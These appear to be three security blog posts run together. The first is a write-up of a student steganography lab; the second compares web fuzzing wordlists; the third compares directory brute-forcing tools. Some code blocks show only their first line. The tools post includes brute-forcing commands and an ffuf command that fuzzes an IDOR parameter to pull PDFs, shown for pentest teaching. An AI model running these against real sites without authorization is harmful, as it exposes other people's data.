Steganography is the process of concealing a confidential message within data. As part of a course taught at ESNA, SEC-IT proposed a series of steganography exercises and challenges; here are the write-ups.
Name | Points |
---|---|
PDF | 50 |
Music please | 50 |
Music please - Flag 2 | 50 |
Stats - MSE | 50 |
Stats - PSNR | 50 |
Purple | 75 |
LSB Factory | 100 |
Linked List LSB | 300 |
The difficulty of each challenge is proportional to the number of points awarded.
PDF
This challenge provides a PDF file. The file is a copy of ESNA's presentation PDF and has a total of 2 pages.
In steganography, PDF files are known for being interpreted differently by different readers, but also for the layering of PDF objects, which can sometimes make objects such as text blocks or images invisible. These same PDF objects may even be listed in the file's cross-reference table without being displayed in the document.
For this challenge, it was simply black text on a black background:
Few PDF readers allow selecting hidden text like this; the reader built into Google Chrome, however, can select all of the text (CTRL+A). Then simply copy and paste the content into a text file.
We end up with the string 92149279564403446967073413054727415165. This is an integer encoded in base 10. To convert this integer into a character string, we can convert it to binary or hexadecimal and then to text, or use the following python3 one-liner:
```python
import binascii
print(binascii.unhexlify(hex(92149279564403446967073413054727415165)[2:]).decode())
```
Another solution in ruby:
```ruby
require 'ctf_party' # gem install ctf-party
```
Flag: ESNA{spAAAAAAce}
Music please
For this challenge, a challenge.wav file was provided. The wav file lasts 31 seconds and contains the beginning of the track IMANU - Memento. The keenest ears will notice a slight crackling present only in the first 4 seconds of the file. This rather high-pitched crackle should show up in the high frequencies of the wav file's audio spectrum. To observe it, simply open the file with the audacity tool.
Once the spectrogram is displayed, it usually appears on a limited scale that does not go beyond 8000 Hz. To display the full spectrum (and therefore the high frequencies), right-click on the frequency scale, then choose Zoom to Fit (Zoom Adapté in the French version).
The spectrum is now fully displayed.
We can see a signal transmitted in the high frequencies using short and long pulses. This is in fact international Morse code, which transmits text through series of short and long pulses. The same code allowed prisoner of war Jeremiah Denton to spell out the word torture during a televised interview using a series of eye blinks. That hidden message notably bypassed Vietnamese censorship and confirmed, for the first time, the use of torture on American prisoners.
```
. ... -. .-
```
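The decoding can also be automated with a small lookup table (a hypothetical helper; only a subset of the international alphabet is mapped here):

```python
# Hypothetical sketch: decode international Morse with a lookup table.
MORSE = {
    ".": "E", "...": "S", "-.": "N", ".-": "A", "....": "H", "..": "I",
    "-..": "D", "--.": "G", "-": "T", "---": "O", ".-.": "R", "--": "M",
    "-.-.": "C", "-.--": "Y", "-..-": "X", "..-": "U", ".--.": "P", ".-..": "L",
}

def decode(signal):
    # Letters are separated by spaces, words by " / " (a common convention).
    return " ".join(
        "".join(MORSE[letter] for letter in word.split())
        for word in signal.split(" / ")
    )

print(decode(". ... -. .-"))  # ESNA
```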
Once decoded, the Morse code reads:
```
ESNA HIDDEN MORSE CODE
```
Flag: ESNA{HIDDEN MORSE CODE}
Music please - Flag 2
Still within the same challenge.wav file, a second message was hidden. The music in the file appears to be cut right before the drop of the original composition (as suggested by its total duration of 31 seconds when opened in a regular player). Moreover, the file size seems abnormally large (a little over 90 megabytes), which usually corresponds to a high-quality recording several minutes long. The file may therefore have been deliberately altered to limit its playback.
To repair the wav file, we first need to look at its file format:
```
[Declaration block of a WAVE-format file]
```
Among all the blocks describing the file, the DataSize block catches our attention. It specifies the size of the audio data in the file. If it has been deliberately decremented, part of the file will not be read by players. The DataSize block is easy to identify since it consists of the 4 bytes following the data constant.
We can now edit our wav file in a hex editor such as hexedit, or with the online hex editor HexEd.it.
The content of the DataSize field is therefore 28 2D B6 00. Note that the size is stored in little-endian order, with the most significant bytes at the end. We thus have 0x00B62D28 bytes (11939112). We will bump this value up to 0xFFB62D28 bytes (4290129192), i.e. the byte sequence 28 2D B6 FF.
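The same edit can be scripted; the sketch below patches a stand-in buffer that mimics the relevant bytes of challenge.wav (the real file would be read from disk instead):

```python
# Sketch: patch the DataSize field, i.e. the 4 little-endian bytes
# following the "data" constant. The buffer mimics the real file layout.
buf = bytearray(
    b"RIFF....WAVEfmt " + b"\x00" * 20 + b"data" + bytes.fromhex("282DB600")
)
pos = buf.find(b"data")                            # locate the data chunk
size = int.from_bytes(buf[pos + 4:pos + 8], "little")
print(hex(size))                                   # 0xb62d28 -> 11939112 bytes
buf[pos + 4:pos + 8] = (0xFFB62D28).to_bytes(4, "little")
print(buf[pos + 4:pos + 8].hex(" ").upper())       # 28 2D B6 FF
```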
Then simply save the file and open it again. The file now has a duration of 3:57.
The music ends with a voice delivering the following message:
```
Bravo, the flag is in uppercase : ESNA{IMANU_MEMENTO}.
```
Flag: ESNA{IMANU_MEMENTO}
Stats - MSE
For this challenge, the files cover_image.png and stego_image.png were provided, with the following statement:

```
Compute the MSE value for the following pair of images, truncated to 10 digits after the decimal point.
```
Having followed the course, or after a quick search engine query, one lands on the Wikipedia page for the Mean Squared Error. This measure is usually associated with the PSNR, covered in the next challenge.
The mean squared error is a statistical estimator which, in image processing, measures the average difference between the pixels of two images. It is defined by the following formula:
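For two m×n images I (cover) and K (stego), the usual definition reads:

```latex
\mathrm{MSE} = \frac{1}{m\,n} \sum_{i=0}^{m-1} \sum_{j=0}^{n-1} \left[ I(i,j) - K(i,j) \right]^2
```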
To compute this value, we use python and the Pillow library.
```python
#!/usr/bin/env python3
```
We get the following output: MSE: 0.49977941176470586.
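A minimal sketch of such a script, assuming the error is averaged over all three RGB channels (the synthetic demo images below stand in for cover_image.png and stego_image.png):

```python
#!/usr/bin/env python3
# Sketch of the MSE computation with Pillow; the challenge script would
# open cover_image.png / stego_image.png instead of the demo images.
from PIL import Image

def mse(img1, img2):
    """Mean squared error over every channel of two same-sized images."""
    total = sum(
        (a - b) ** 2
        for p1, p2 in zip(img1.getdata(), img2.getdata())
        for a, b in zip(p1, p2)
    )
    return total / (len(img1.getbands()) * img1.width * img1.height)

# Demo: two 2x2 images differing by one LSB on a single red channel.
a = Image.new("RGB", (2, 2), (10, 10, 10))
b = a.copy()
b.putpixel((0, 0), (11, 10, 10))
print(f"MSE: {mse(a, b)}")   # 1 / 12 = 0.0833...
```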
Flag: ESNA{0.4997794117}
Stats - PSNR
The statement of this challenge reused the same two images as the previous one, this time asking for the PSNR value of the two images. The PSNR (Peak Signal-to-Noise Ratio) is a distortion measure computed directly from the mean squared error (i.e., the MSE value calculated in the previous challenge). The PSNR is defined as follows:
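With MAX_I the maximum possible pixel value (255 for 8-bit channels), the usual definition reads:

```latex
\mathrm{PSNR} = 10 \cdot \log_{10}\!\left(\frac{\mathit{MAX}_I^{\,2}}{\mathrm{MSE}}\right)
             = 20 \cdot \log_{10}\!\left(\frac{\mathit{MAX}_I}{\sqrt{\mathrm{MSE}}}\right)
```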
To solve the challenge, we simply reuse our script and add the computation of this formula. Note the import of the log10 function from the native math library:
```python
#!/usr/bin/env python3
```
We get the following output: PSNR: 51.14301999315866.
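The added computation boils down to the following sketch, where mse_value is the result of the previous challenge:

```python
from math import log10

mse_value = 0.49977941176470586   # MSE from the previous challenge
max_i = 255                       # maximum value of an 8-bit channel
psnr = 10 * log10(max_i ** 2 / mse_value)
print(f"PSNR: {psnr}")
```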
Flag: ESNA{51.1430199931}
Purple
This challenge provides a challenge.bmp file. The exiftool command gives us more information about the file format:
```
$ exiftool challenge.bmp
```
We therefore have a bitmap image with the following masks:
Searching for these values on the internet, we realize the image is saved using the RGB565 mode (also called R5G6B5). These figures correspond to the number of bits allocated per channel (16 bits in total). A search for R5G6B5 BMP steganography leads us to the article "BMP PCM polyglot".
Note: the site could also be found with the search "BMP 16 bits polyglot".
The article explains that it is possible to create a file that is both a valid BMP image and a raw (PCM) audio file. To do so, both source files must be encoded on 16 bits (the wav file as well as the bitmap) in order to generate a 32-bit BMP. The article explains that combining the files widens the audio spectrum and places the pixel content in the inaudible range. The R5G6B5 mask definition then indicates the position of the image data within the file.
To play the image, the article suggests using aplay or audacity. For the latter, simply launch the tool, click File > Import > Raw Data..., and select the image. Then specify Signed 32-bit PCM encoding, Little-endian byte order, Stereo channels and a 44100 Hz sample rate:
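As a scripted alternative to the manual import, the raw bytes can be wrapped in a WAV header with Python's stdlib wave module so that any player applies the same parameters (wrap_pcm and the output file name are illustrative):

```python
#!/usr/bin/env python3
# Hedged sketch: wrap raw bytes in a WAV header so players read them as
# signed 32-bit little-endian stereo PCM at 44100 Hz, mirroring the
# Audacity raw-import settings above.
import os
import wave

def wrap_pcm(raw: bytes, path: str) -> None:
    with wave.open(path, "wb") as out:
        out.setnchannels(2)      # stereo
        out.setsampwidth(4)      # 4 bytes per sample -> Signed 32-bit PCM
        out.setframerate(44100)  # 44100 Hz
        out.writeframes(raw)

if os.path.exists("challenge.bmp"):  # the provided challenge file
    with open("challenge.bmp", "rb") as f:
        wrap_pcm(f.read(), "challenge_audio.wav")
```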
Once our file is loaded in audacity, a sped-up human voice can be heard. To slow it down, select the audio (CTRL+A), then open the Effects menu, choose the slow-down effect and apply a ratio of 0.250.
By clicking the play button, we hear the following message:
```
GG well play, the flag is in uppercase :
```
Flag: ESNA{LITTLEPOLY}
LSB Factory
This challenge provides a website with an upload form and a timer of a few seconds. The website asks us to encode a given message into an image using the LSB technique:
The LSB technique was covered during the lecture preceding the lab, so we invite the reader to look it up in order to understand the rest of this write-up. To solve this challenge, we will develop a python script using the requests library for the web requests and pillow to handle the image. A partial script was also provided as a hint, where only the LSB manipulation was left to implement (only lines 33 to 50 were missing). Here is the final script:
```python
#!/usr/bin/env python3
```
In more detail:
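The missing lines essentially had to write the message bits into the image. A hedged sketch of that kind of LSB embedding with Pillow (embed_lsb and the demo image are illustrative, not the challenge's exact code):

```python
# Hedged sketch of LSB embedding: write each bit of the message into the
# least significant bit of successive channel values, pixel by pixel.
from PIL import Image

def embed_lsb(img: Image.Image, message: bytes) -> Image.Image:
    bits = [(byte >> i) & 1 for byte in message for i in range(7, -1, -1)]
    out = img.copy()
    pixels = out.load()
    it = iter(bits)
    done = False
    for y in range(out.height):
        for x in range(out.width):
            channels = list(pixels[x, y])
            for c in range(len(channels)):
                bit = next(it, None)
                if bit is None:
                    done = True
                    break
                channels[c] = (channels[c] & ~1) | bit
            pixels[x, y] = tuple(channels)
            if done:
                break
        if done:
            break
    return out

img = Image.new("RGB", (4, 4), (255, 255, 255))
stego = embed_lsb(img, b"A")                      # 'A' = 0b01000001
print([v & 1 for v in stego.getpixel((0, 0))])    # [0, 1, 0]
```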
Once launched, the script returns the flag:
```
Image size: 400x400
```
Flag: ESNA{I_made_4n_anoying_LSB_Steg0_ch4ll}
Linked List LSB
This challenge was the most difficult of the whole lab. To solve it, a scientific paper is provided along with a PNG image. The paper proposes a steganographic scheme based on the LSB method combined with a distribution of the pixels following a linked-list principle.
In this scheme, a link (or block) is represented by a sequence of consecutive pixels. The data stored by the block (the secret value) is encoded on the LSBs of its first 3 pixels. The address of the next link (and thus the number of the next pixel) is stored on the remaining LSBs of the block.
With this technique, the size of a block depends on the size required to store the address of the next block, and therefore indirectly on the size of the image. The bigger the image, the more pixels it has, the more bits a pixel address requires, and the bigger a block will be.
More precisely, the size required to store an address is defined as follows:
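With W×H the image dimensions and 3 usable LSBs per RGB pixel, the definition can be written as (a reconstruction consistent with the numbers computed below; the paper's exact notation may differ):

```latex
k = \left\lceil \log_2(W \times H) \right\rceil, \qquad
\text{pixels}_{\text{addr}} = \left\lceil \frac{k}{3} \right\rceil
```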
The first step was therefore to compute the size of an address and of a block for the given image.
Our image has a size of 3840x2160, i.e. a total of 8294400 pixels. Addressing that many pixels therefore requires 23 bits, since 2^23 = 8388608 ≥ 8294400 (here, k = 23). Spreading these 23 bits over the LSB layers takes 7 full pixels plus 2 channels, i.e. 8 pixels in total. An address is therefore 8 pixels long. A block is thus 3 data pixels + 8 address pixels, for a total of 11 pixels per block.
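These steps translate directly into a few lines of python, consistent with the figures above:

```python
from math import ceil, log2

width, height = 3840, 2160
k = ceil(log2(width * height))     # bits needed to address any pixel
addr_pixels = ceil(k / 3)          # 3 usable LSBs (R, G, B) per pixel
block_size = 3 + addr_pixels       # 3 data pixels + address pixels
print(k, addr_pixels, block_size)  # 23 8 11
```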
Once the block size is computed, we need an extraction function that retrieves both the secret value hidden in the link and the address of the next link. In our script, this function takes as input the address of a link within the pixel list data, appends the block's secret to the secret_msg variable, and returns the address of the next block:
```python
def get_data(addr):
```
Since the challenge statement gives us the address of the first block (Starting pixel : 6075891), manually checking the function's results on this first block lets us verify that it works correctly. We indeed recover the letter E and the address of the next link: 2732600.
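A possible shape for this function, written here over a flat list of (R, G, B) tuples (a sketch; the exact bit ordering is an assumption and the paper may define it differently):

```python
def get_data(addr, pixels, addr_pixels=8):
    """Return (secret_char, next_addr) for the block starting at pixel addr.

    pixels is a flat list of (R, G, B) tuples; the 3 data pixels carry the
    secret on their LSBs, the remaining pixels carry the next address.
    """
    lsbs = [c & 1 for p in pixels[addr:addr + 3 + addr_pixels] for c in p[:3]]
    secret = int("".join(map(str, lsbs[:8])), 2)      # 8 of the 9 data LSBs
    next_addr = int("".join(map(str, lsbs[9:])), 2)   # remaining address LSBs
    return chr(secret), next_addr

# Demo on a synthetic block encoding "E" followed by the address 2732600.
bits = [0, 1, 0, 0, 0, 1, 0, 1, 0] + [int(b) for b in format(2732600, "024b")]
block = [tuple(bits[i:i + 3]) for i in range(0, 33, 3)]
print(get_data(0, block))   # ('E', 2732600)
```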
The final extraction script combines the get_data function with a loop, preceded by the automatic computation of the link size:
```python
#!/usr/bin/env python3
```
Running the script returns the flag:
Flag: ESNA{L1nk3d_List_LSB_technique}
This article was written by Alex GARRIDO a.k.a. zeecka. Alex is a pentester at SEC-IT.
Website: zeecka.fr
Perimeter discovery is an important step during a web pentest and can, in some cases, lead to a website compromise. In order to carry out this reconnaissance, several tools are available, including web content wordlists for web fuzzing:
Name | First release | Last Update | Max Size (lines) |
---|---|---|---|
SecLists | 2012/02/20 | 2021/02/12 | 1.273.833 (directory-list-2.3-big.txt) |
Assetnote wordlists | 2020/11/16 | 2021/01/28 | 4.319.406 (httparchive_js_2020_11_18.txt) |
Dirb wordlists | 2015/06/16 | 2015/06/16 | 20.469 (big.txt) |
DirBuster wordlists | 2013/05/01 | 2013/05/01 | 220.560 (directory-list-2.3-medium.txt) |
Dirsearch dicc.txt | 2013/05/22 | 2021/02/10 | 9.021 (dicc.txt) |
Wfuzz wordlists | 2014/10/23 | 2019/03/14 | 45.459 (megabeast.txt) |
Wordlistctl (Bonus) | 2018/10/28 | 2018/11/02 | N/A |
* this post has been written in Feb. 2021
Note that this post only covers routes, files and folders wordlists. Therefore, wordlists which include passwords, such as rockyou.txt, will not be covered.
SecLists is a collection of multiple types of wordlists, including usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
SecLists is the security tester's companion. [...] The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.
The repository is actively maintained, with its last commit less than two weeks ago. The package is provided by most pentesting Linux distributions such as BlackArch and Kali Linux.
The covered wordlists are located in Discovery/Web-Content/. We can notice that there are a lot of available wordlists (121 in the main folder). Some of them are specific to a given technology (CGIs.txt, coldfusion.txt, oracle.txt...), others are specific to a given language (common-and-french.txt, common-and-dutch.txt...). The main wordlist family present in SecLists is the "RAFT Word Lists".
The RAFT wordlists have been generated from the robots.txt files of 1.7 million websites and were originally provided by the RAFT tool in 2011. In this family, wordlists are split as follows:
Name | Size (lines) large | Size (lines) medium | Size (lines) small |
---|---|---|---|
raft-*-directories.txt | 62.283 | 30.000 | 20.116 |
raft-*-directories-lowercase.txt | 56.163 | 26.584 | 17.770 |
raft-*-files.txt | 37.042 | 17.128 | 11.424 |
raft-*-files-lowercase.txt | 35.324 | 16.243 | 10.848 |
raft-*-extensions.txt | 2.449 | 1.289 | 963 |
raft-*-extensions-lowercase.txt | 2.366 | 1.233 | 914 |
raft-*-words.txt | 119.600 | 63.087 | 43.003 |
raft-*-words-lowercase.txt | 107.982 | 56.293 | 38.267 |
Looking at raft-*-files.txt, we get the following extension distribution:
Histogram | Pie chart |
---|---|
SecLists also includes wordlists provided with dirbuster and dirb, covered in the rest of this post.
Assetnote is a company that provides security tools and services to measure exposure to external attacks. The company also provides a repository named Assetnote Wordlists.
These wordlists are generated monthly from Google BigQuery datasets with their Go client named commonspeak2, resulting in content discovery and subdomain wordlists.
As these datasets are updated on a regular basis, the wordlists generated via Commonspeak2 reflect the current technologies used on the web.
Wordlists are generated per technology; for this post we will focus on directories, API routes and the PHP, ASP.NET and JSP/JSPA languages.
Note: As the January 2021 wordlists seem less complete than the previous ones, and the February 2021 wordlists are not available at this time, we will focus on the November 2020 wordlists.
Name | Technology | Size (lines) |
---|---|---|
httparchive_directories_1m_2020_11_18.txt | Directories | 1.000.000 |
httparchive_apiroutes_2020_11_20.txt | API routes | 953.011 |
httparchive_php_2020_11_18.txt | PHP | 74.887 |
httparchive_aspx_asp_cfm_svc_ashx_asmx_2020_11_18.txt | ASP .NET | 63.200 |
httparchive_jsp_jspa_do_action_2020_11_18.txt | JSP | 10.506 |
Assetnote Directories | Assetnote API routes |
---|---|
Note: /, - and _ are considered as wildcards in the previous graph.
Dirb is a web discovery tool already covered in a previous post. The tool is provided with multiple wordlists, including the most common ones:
Name | Size (lines) |
---|---|
common.txt (default wordlist for dirb) | 4.614 |
big.txt | 20.469 |
small.txt | 959 |
Charsets in dirb family. | |
---|---|
Those wordlists don't have any extensions, and only 2% of the words contain capital letters. You can also note that there are more "other" charset entries in common.txt than in big.txt.
DirBuster is a web discovery tool that has also been covered in a previous post. The tool is provided with multiple wordlists including directory-list-2.3
wordlists family.
Name | Size (lines) |
---|---|
directory-list-2.3-big.txt | 1.273.833 |
directory-list-2.3-medium.txt | 220.560 |
directory-list-2.3-small.txt | 87.664 |
Some packaged versions may not include directory-list-2.3-big.txt.
Like the dirb wordlists, directory-list-2.3 doesn't include any extensions.
Charsets in directory-list-2.3 family. | |
---|---|
Note: /
, -
and _
are considered as a wildcard in the previous graph.
dicc.txt is a wordlist provided with the dirsearch tool. The wordlist has the particularity of providing the variable extension %EXT%. Therefore, it must be used with tools that support the %EXT% format (see the post about web discovery tools). The wordlist has a total of 9021 lines, distributed as follows:
dicc.txt | |
---|---|
You can note that there are "only" 500 words containing the %EXT% extension.
The Wfuzz tool is provided with a lot of wordlists. Some of them, in the "general" directory, are dedicated to directory and file enumeration. That's the case of megabeast.txt, big.txt, medium.txt and common.txt. None of those wordlists have words containing extensions. They are distributed as follows:
Charsets in wfuzz family. | |
---|---|
In some cases, an auditor may look for a specific wordlist. Wordlistctl is a tool designed to fetch, install, update and search wordlists. This python script offers more than 6400 wordlists and is maintained by the BlackArch Linux distribution.
```
$ wordlistctl search wordpress
```
I (Alexandre ZANNI a.k.a. noraj) am adding a little bonus section about security.txt in web wordlists to Alex GARRIDO's (a.k.a. zeecka) article.
In 2020, I wrote an article about security.txt on the TurgenSec blog: Security.txt | Progress in Ethical Security Research.
I invite you to read the article to understand what security.txt is, what it is used for, and how widely adopted it has become.
Here we are only going to get an idea of how widely security.txt is included in security wordlists.
Among the 233 lists used for Web content discovery in SecLists, only 3 actually include at least one variant of the security.txt file.
```
$ grep -rnE '^security.txt|.well-known/security.txt' /usr/share/seclists/Discovery/Web-Content
```
We can conclude that only 1.3% of the Web content discovery lists in SecLists include security.txt.
But SVNDigger/all.txt only includes security.txt, while common.txt and dirsearch.txt only include .well-known/security.txt. So zero lists include both variants.
The Assetnote Wordlists are split into 3 categories:
We'll exclude the technology lists from the stats since they focus on specific products.
Among the 77 generic wordlists used for Web content discovery in the Assetnote Wordlists, only 3 actually include at least one variant of the security.txt file.
```
$ grep -rnE '^security.txt|.well-known/security.txt' /tmp/assetnote-wordlists/{automated,manual}
```
We can conclude that only 3.8% of the Web content discovery lists in the Assetnote Wordlists include security.txt.
But all three of them only include security.txt and do not include the standard path .well-known/security.txt.
If you are trying to find security.txt files, you should build a custom wordlist including the two following entries, as most of the generic wordlists don't include them.
```
security.txt
.well-known/security.txt
```
An alternative would be to run the common wordlists you are used to fuzzing with, and to build an additional wordlist containing only files like security.txt or other files that may be missing from most wordlists, so you don't have to maintain the generic part on your own.
Without further ado, here is a comparative table of the different wordlists discussed in this post. Colored cells represent a high correlation between wordlists. To understand the matrix you should read: "N% of the wordlist at line Y is contained in the wordlist at column X".
E.g., 87% of wordlist n°17 (dirb - small) is contained in wordlist n°0 (seclists - raft-large-files).
The sources used to generate this chart are available in this repository: sec-it/WL-Comparison.
An interactive version of the chart is available online.
This piece was written by Alex GARRIDO a.k.a. zeecka. Alex is a pentester at SEC-IT.
Website: zeecka.fr
Perimeter discovery is an important step during a web pentest and can, in some cases, lead to a website compromise. In order to carry out this reconnaissance, several tools are available, including web content enumeration tools:
Name | Version* | First release | Last Release | Language |
---|---|---|---|---|
Dirb | 2.22 | 2005/04/27 | 2014/11/19 | C |
DirBuster | 1.0-RC1 | 2007 | 2013/05/01 | Java |
Dirsearch | 0.4.1 | 2014/07/07 | 2020/12/08 | Python3 |
FFUF | 1.2.1 | 2018/11/08 | 2021/01/24 | Go |
Gobuster | 3.1.0 | 2015/07/21 | 2020/10/19 | Go |
Wfuzz | 3.1.0 | 2014/10/23 | 2020/11/06 | Python3 |
BFAC (Bonus) | 1.0 | 2017/11/08 | 2017/11/08 | Python3 |
* this post has been written in Feb. 2021
Other tools such as Rustbuster, FinalRecon or Monsoon exist and won't be fully described, since they are less known and less used. They will nonetheless be included in the synthesis.
Dirb is a web content scanner written in C and provided by The Dark Raver since 2005.
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary based attack against a web server and analyzing the response.
The last release of this tool, version 2.22, dates back to 2014. The package is provided by most pentesting Linux distributions such as BlackArch and Kali Linux.
The tool is provided with many wordlists, including big.txt and common.txt (its default wordlist). Dirb also ships with two utilities: html2dic, an equivalent of cewl, and gendict, an equivalent of crunch, both used for wordlist generation.
Although dirb is one of the oldest web discovery tools, it offers most of the advanced options, such as custom headers, custom extensions, authenticated proxy and even interactive recursion. Unfortunately, it is one of the rare tools without multithreading support.
- Interactive recursion (-R option)

DirBuster is a web content scanner written in Java, provided by the OWASP Foundation since 2007. The project is no longer maintained by OWASP and its features are now part of the OWASP ZAP proxy. The last release of the tool was version 1.0-RC1 in 2008. DirBuster has the particularity of providing a GUI:
Even if the project is no longer offered by OWASP, the source of the tool can be found on SourceForge. The tool is also provided by most pentesting Linux distributions.
The tool is packaged with 8 wordlists including directory-list-1.0.txt
and apache-user-enum-2.0.txt
.
- Link extraction from HTML pages (src and href attributes)

Dirsearch is a command-line tool designed to brute force directories and files on web servers. The tool has been written in Python3 since 2015, having been initially designed in 2014 in Python2. Dirsearch is still maintained and its last release was in December 2020.
As a feature-rich tool, dirsearch gives users the opportunity to perform a complex web content discovering, with many vectors for the wordlist, high accuracy, impressive performance, advanced connection/request settings, modern brute-force techniques and nice output.
As you can see, dirsearch provides many options to perform wordlist transformations, such as extension exclusion, suffixes and extension removal. Dirsearch even provides 429 - Too Many Requests error handling, raw request handling, and regex checks. Dirsearch ships with a default wordlist named dicc.txt, which contains %EXT% tags that are replaced with user-defined extensions.
Finally, dirsearch provides multiple report formats, including text, JSON, XML, Markdown and CSV.
- Raw requests with the --raw option, and any HTTP method with -m
Like Dirsearch, FFUF provides filter and "matcher" options (including regex) to sort results, and many output formats (including JSON and XML). FFUF is the only one to provide a multi-wordlist operation mode, similar to the attack types of the BurpSuite intruder. This mode can be used for bruteforce attacks or complex fuzzing discovery.
Finally, we can note that the -D option allows us to reuse specific Dirsearch wordlists such as dicc.txt.
As indicated by its name, Gobuster is a tool written in Go. The first release of gobuster was in 2015 and the latest in October 2020. Gobuster is a powerful multi-purpose tool:
Gobuster is a tool used to brute-force: URIs (directories and files) in websites, DNS subdomains (with wildcard support), Virtual Host names on target web servers, and open Amazon S3 buckets.
As mentioned in the project description, Gobuster was originally created to avoid the DirBuster Java GUI, and it does support content discovery with multiple extensions at once.
As said in the tool's description, Gobuster aims to be a simple tool without any fancy options. Note that Gobuster ships without any wordlist.
- -d option to discover backup files
option to discover backup filesWfuzz is a web fuzzer written in Python3 and provided by Xavi Mendez since 2014.
Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload.
The tool is still maintained with a recent release in November 2020. The package is provided by most of pentesting Linux releases.
The tool is provided with a lot of wordlists: General (big.txt, common.txt, medium.txt...), Webservices (ws-dirs.txt and ws-files.txt), Injections (SQL.txt, XSS.txt, Traversal.txt...), Stress (alphanum_case.txt, char.txt...), Vulns (cgis.txt, coldfusion.txt, iis.txt...) and others.
Like FFUF, Wfuzz replaces the FUZZ keyword with a payload from a given wordlist. Wfuzz provides multiple filters, including regex filters (--ss/hs), and supports multiple output formats (JSON, CSV, ...). Also, Wfuzz is one of the rare tools to support basic auth, NTLM auth and digest auth.
BFAC (Backup File Artifacts Checker) is not a tool designed to search for new folders, files or routes, but one designed to search for backup files.
BFAC (Backup File Artifacts Checker) is an automated tool that checks for backup artifacts that may disclose the web application's source code. The artifacts can also lead to leakage of sensitive information, such as passwords, directory structure, etc.The goal of BFAC is to be an all-in-one tool for backup-file artifacts black box testing.
Given a list of file URIs, BFAC will attempt to recover the associated backup files using a hardcoded list of tests. For example, for the file /index.php, BFAC will not only attempt to recover /index.php.swp and /index.php.tmp, but also run tests such as /Copy_(2)_of_index.php, /index.bak1 or /index.csproj.
As you can imagine, BFAC should be used as a complement to the previous tools. It supports most of the expected features, such as proxy support, custom headers and different output formats.
The main use of these tools is file discovery on a common web server, such as a PHP website running on apache2. Searching for files on this kind of web server often leads to HTTP errors such as 404 - File not found or 403 - Forbidden, or HTTP successes such as 200 - OK. Other HTTP status codes may be encountered, like 302 - Found, 429 - Too Many Requests, 500 - Internal Server Error...
Depending on the server configuration, an auditor may or may not include specific HTTP status codes during file discovery. The default configuration of most tools is to hide 404 - File not found results. Displayed status codes may vary between tools, but 200 - OK is the most commonly displayed result.
E.g., by default, Dirsearch will print not only the 200 status code but also 301, 302, etc.
```
dirsearch -u http://localhost/
```
Note: By default, dirsearch only replaces the %EXT% keyword with extensions. Using the -f flag will force dirsearch to append extensions to every word of a given wordlist. This option is useless if your wordlist already contains file extensions.
The same task can be accomplished with the other tools:
```
dirb http://localhost/ /usr/share/wordlists/raft-large-words.txt -X php,php5,sql
```
Sometimes, a server won't reply as your tools expect and will return a 403 error instead of a 404 error, or worse, a 200 status code with a custom error page.
In this case, the auditor must configure his tool to match the server's answers. For the 403 case, the first solution is to exclude 403 results:
```
dirb http://localhost/ /usr/share/wordlists/raft-large-words.txt -X php,php5,sql -N 403
```
With this solution the auditor may miss interesting 403 errors. The second option is to filter more precisely the content you are not looking for.
If the 403 error is a custom page, or if you get a 200 status code with an error message, you may filter web pages by their content rather than by their status code. Tools provide multiple ways to do that: you can either filter by page size (assuming the error page always has the same size), or filter by words or a regex present in the web page.
E.g., if a website returns a 200 HTTP status code with an HTML page containing the sentence Page not found, you may filter with the following:
```
dirsearch -u http://localhost/ --exclude-texts="Page not found" -e php,php5,sql -w /usr/share/wordlists/raft-large-words.txt -f
```
Note that this method is not available in every tool.
With the evolution of Web development standards, auditors encounter more and more varied web routing techniques. Therefore, it is not rare that resources are accessible through dynamic routes. That's the case of RESTful web APIs, where certain resources must be fuzzed in the middle of a URI.
Let's take the example of a REST API where the route /vps/{serviceName}/ips is available with GET requests (and where the route /vps/{serviceName} doesn't exist). To enumerate this parameter, you have several possibilities:
- use /ips as an extension 🧐 ;
- use ffuf or wfuzz to perform precise parameter fuzzing (recommended).

```
[deprecated] dirsearch -u http://localhost/vps/ --suffixes /ips -w /usr/share/wordlists/raft-large-words.txt
```
Sometimes the resource location is based on a more complex parameter, such as the Accept-Language header, an HTTP POST parameter or even the IP address.
During a pentest, SEC-IT auditors encountered a vulnerability allowing users to download PDFs from the page /files/pdf with the POST parameter {"objectId": "X"}, where X is an integer. The vulnerability itself was an IDOR (Insecure Direct Object Reference): a user could download any PDF without privilege restriction. The problem is that even though the vulnerable parameter was a pseudo-incremental ID, there was a random step between each ID, which makes the exfiltration harder without tooling.
To perform this PDF exfiltration, web fuzzers like ffuf and wfuzz can be used to fuzz the objectId POST parameter:
```
ffuf -u http://localhost/files/pdf -X POST -d '{"objectId" : "FUZZ"}' -w /usr/share/wordlists/ints.txt
```
Without further ado, here is a comparative table of the different tools discussed in this post:
Tool | Dirb | Dirbuster | Dirsearch | FFUF | GoBuster | Wfuzz | Rustbuster | FinalRecon | Monsoon | BFAC |
---|---|---|---|---|---|---|---|---|---|---|
Language | C | Java | Python3 | Go | Go | Python3 | Rust | Python3 | Go | Python3 |
First release | 27/04/2005 | 2007 | 07/07/2014 | 08/11/2018 | 21/07/2015 | 23/10/2014 | 20/05/2019 | 05/05/2019 | 12/11/2017 | 08/11/2017 |
Last release | 19/11/2014 | 01/05/2013 | 08/12/2020 | 24/01/2021 | 19/10/2020 | 06/11/2020 | 24/05/2019 | 23/11/2020 | 28/10/2020 | 08/11/2017 |
Current version | 2.22 | 1.0-RC1 | 0.4.1 | 1.2.1 | 3.1.0 | 3.1.0 | 1.1.0 | no versionning | 0.6.0 | 1.0 |
License | GPLv2 | LGPL-2 | GPLv2 | MIT | Apache License 2.0 | GPLv2 | GPLv3 | MIT | MIT | GPLv3 |
Maintained | No | No | Yes | Yes | Yes | Yes | Yes | Yes | Yes | Yes |
GUI/CLI | CLI | GUI (Java) | CLI (colorized by default) | CLI (colorize option) | CLI | CLI (colorize option) | CLI | CLI (colorized by default) | CLI (colorized by default) | CLI (colorized by default) |
Profile options file | No | No but ability to modify default threads, WL and extensions | Yes (default.conf) | Yes (-config) | No | Yes (--recipe) | No | No | Yes (-f) | No |
